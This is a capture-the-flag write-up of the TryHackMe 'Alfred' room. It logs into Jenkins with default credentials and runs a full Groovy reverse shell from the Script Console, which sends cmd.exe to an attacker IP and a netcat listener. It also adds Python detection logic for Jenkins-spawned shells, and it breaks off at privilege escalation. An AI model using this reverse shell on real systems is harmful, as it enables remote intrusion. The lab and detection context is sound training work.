https://tryhackme.com/room/alfred

Pwned Date - 21st July 2022

Enumeration

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2022-07-14T04:18:25+00:00
|_ssl-date: 2022-07-14T04:18:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-07-13T04:14:38
|_Not valid after:  2023-01-12T04:14:38
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 (IIS 7.5) there is nothing interesting.

On port 8080, behind the Jetty server, we find a Jenkins login page.

Exploitation

With the default credentials admin:admin we can log in to the admin dashboard.

Going to Manage Jenkins > Script Console we can execute our commands.

Note that the Jenkins Script Console runs Groovy, so we can use the following Groovy reverse shell from PayloadsAllTheThings (Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings):

String host = "10.8.21.209";
int port = 1234;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// relay process output to the socket and socket input to the process until either side closes
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Meanwhile we have netcat listening on port 1234, which catches the shell:

┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.8.21.209] from (UNKNOWN) [10.10.141.203] 49192
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Jenkins>whoami
whoami
alfred\bruce

<...SNIPPET cd to C:\Users\bruce\Desktop>

C:\Users\bruce\Desktop>more user.txt
79007a09481963edf2e1321abd9ae2a0
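
From the defender's side, the Script Console reverse shell above shows up on the host as the Jenkins Java service spawning an argument-less cmd.exe, which is exactly what a normal "Execute Windows batch command" build step never does (those run cmd /c call <tmp>.bat). The following Python detection logic is an added example, not part of the original writeup, run over constructed Sysmon-style process-creation records; the install path from the prompt above and the jre\bin\java.exe location are assumptions.

```python
JENKINS_DIR = r"c:\program files (x86)\jenkins"   # assumed install path, as seen in the shell prompt
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 2488, "User": r"ALFRED\bruce",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "ParentCommandLine": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe -jar jenkins.war"},
    {"ProcessId": 3104, "User": r"ALFRED\bruce",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c call "C:\Program Files (x86)\Jenkins\workspace\build\hudson1234.bat"',
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "ParentCommandLine": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe -jar jenkins.war"},
    {"ProcessId": 3512, "User": r"ALFRED\bruce",
     "Image": r"C:\Program Files\Git\cmd\git.exe", "CommandLine": "git fetch origin",
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "ParentCommandLine": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe -jar jenkins.war"},
    {"ProcessId": 1920, "User": r"ALFRED\bruce",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def parent_is_jenkins(event):
    parent = event.get("ParentImage", "")
    # Jenkins may run on a bundled JRE or on a system-wide Java, so accept either
    # a java.exe under the install directory or one launched with jenkins.war.
    return basename(parent) == "java.exe" and (
        parent.lower().startswith(JENKINS_DIR)
        or "jenkins.war" in event.get("ParentCommandLine", "").lower()
    )

def classify(event):
    """None, 'build-step' or 'interactive-shell' for one process-creation event."""
    if not parent_is_jenkins(event) or basename(event.get("Image", "")) not in SHELLS:
        return None
    # A batch build step runs "cmd /c call <tmp>.bat"; the Script Console payload
    # starts a bare cmd.exe with no arguments at all, so argument count separates them.
    return "interactive-shell" if len(event.get("CommandLine", "").split()) <= 1 else "build-step"

def find_suspicious(events):
    """Process IDs of Jenkins-spawned shells that carry no build-step arguments."""
    return [e["ProcessId"] for e in events if classify(e) == "interactive-shell"]
```

Jenkins-spawned shells tagged build-step are still worth baselining per job, since a malicious build step is the other common way to turn Jenkins access into code execution.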

Privilege Escalation

To get all privilege information